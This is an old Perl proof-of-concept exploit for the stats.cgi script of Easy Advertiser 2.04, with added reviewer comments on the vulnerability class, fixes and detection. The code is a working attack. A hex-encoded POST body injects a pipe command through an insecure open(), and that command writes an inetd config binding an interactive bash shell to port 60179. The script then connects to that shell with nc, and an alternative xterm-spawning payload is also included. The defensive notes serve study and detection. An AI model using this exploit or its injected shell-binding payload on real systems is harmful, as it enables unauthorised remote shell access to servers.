#!/usr/bin/perl -w
## Easy Advertiser v. 2.04 / (c) 1999 Smokey
## Communications, LLC - PoC exploit.
## http://www.smokey.net/
##
## Exploits an insecure open() in that stats.cgi
## script. The exploit will attempt to bind a
## shell with nobody/99 privileges on port 60179
## This will not work if the $target does not
## have inetd installed. I have included the code
## to simply spawn an xterm as well.
##
## [ Wed Oct 4 16:53:05 CEST 2000 ]
##
## http://teleh0r.cjb.net/ || teleh0r@doglover.com
#
# Reviewer notes (defensive reading of this PoC):
#
# Vulnerability class: the header above says stats.cgi hands a form field
# to an "insecure open()". The request body below wraps the `adsn` value
# in `|` characters, which is consistent with the Perl two-argument open()
# filename injection: a leading or trailing pipe in the "filename" makes
# open() run it as a command. Application-side fix: three-argument open()
# with an explicit mode, taint mode (-T), and an allow-list check on the
# field before it reaches any file or process call.
#
# Detection: POST requests to /cgi-bin/stats.cgi whose `adsn` field
# contains `|` (or `%7C`); an inetd process started with a configuration
# file under /tmp; an unexpected listener on TCP 60179 owned by the web
# server user (the header says nobody/99).
#
# Script hygiene of this file itself: bareword filehandle SOCKET, the
# unused lexical $length, and $target interpolated into a shell command
# line via system() instead of the list form.
#
# NOTE(review): this copy of the listing was collapsed onto very few
# physical lines. Only line breaks that Perl's comment syntax makes
# unambiguous have been restored; every literal is kept exactly as shown.

use strict;
use Socket;

# Require the target host as the single positional argument.
# NOTE(review): the usage text reads "Usage: $0 \n" in this copy; the
# argument placeholder was probably dropped during extraction.
if (@ARGV < 1) {
    print("Usage: $0 \n");
    exit(1);
}

# $length is declared here but never assigned or read anywhere below.
my($target, $length, $cgicode, $agent, $sploit, $iaddr, $paddr, $proto);

$target = $ARGV[0];
print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/stats.cgi\n");

# Browser-like User-Agent header value.
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

# URL-encoded form body written as escaped bytes. The author's own
# decoding of it is in the three comment lines that follow: the `adsn`
# field carries a pipe-wrapped shell command, which is what the
# vulnerable open() consumes.
$cgicode =
# echo 'fido stream tcp nowait nobody /bin/bash bash -i' > /tmp/.hass;
# /usr/sbin/inetd /tmp/.hass
# stats.cgi port binding cgicode (port fido/60179)
"\x73\x74\x61\x74\x73\x3d\x73\x74\x61\x74\x73\x26\x6e".
"\x61\x6d\x65\x3d\x74\x65\x6c\x65\x68\x30\x72\x26\x61".
"\x64\x73\x6e\x3d\x7c\x65\x63\x68\x6f\x2b\x27\x66\x69".
"\x64\x6f\x2b\x73\x74\x72\x65\x61\x6d\x2b\x74\x63\x70".
"\x2b\x6e\x6f\x77\x61\x69\x74\x2b\x6e\x6f\x62\x6f\x64".
"\x79\x2b\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x2b\x62".
"\x61\x73\x68\x2b\x2d\x69\x27\x2b\x3e\x2b\x2f\x74\x6d".
"\x70\x2f\x2e\x68\x61\x73\x73\x3b\x2f\x75\x73\x72\x2f".
"\x73\x62\x69\x6e\x2f\x69\x6e\x65\x74\x64\x2b\x2f\x74".
"\x6d\x70\x2f\x2e\x68\x61\x73\x73\x7c\x26\x6c\x6f\x67".
"\x69\x6e\x3d\x4c\x6f\x67\x69\x6e";

# To spawn an xterm instead:
# "stats=stats&name=teleh0r&adsn=%7Cxterm+-ut+-display+".
# "target.com "%3A0%7C&login=Login";

# Raw HTTP/1.0 POST request. NOTE(review): in this copy the literal is a
# single line with spaces where the original listing presumably had
# header line breaks; it is reproduced exactly as shown.
$sploit = "POST /cgi-bin/stats.cgi HTTP/1.0 Connection: close User-Agent: $agent Host: $target Content-type: application/x-www-form-urlencoded Content-length: 168 $cgicode";

# Resolve the host, connect to TCP port 80, send the request followed by
# CRLF, then close. Nothing here reads from SOCKET, so the HTTP response
# is never inspected.
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n");
close(SOCKET);

# Pause, then hand the terminal to an external nc(1). $target is
# interpolated into a shell string here; the list form of system()
# would pass it as a single argument without involving the shell.
print("\nSleeping 5 seconds - waiting for the shell ...\n\n");
sleep(5);
system("nc -w 10 $target 60179");
exit(0);

# www.hack.co.za [12 October 2000]#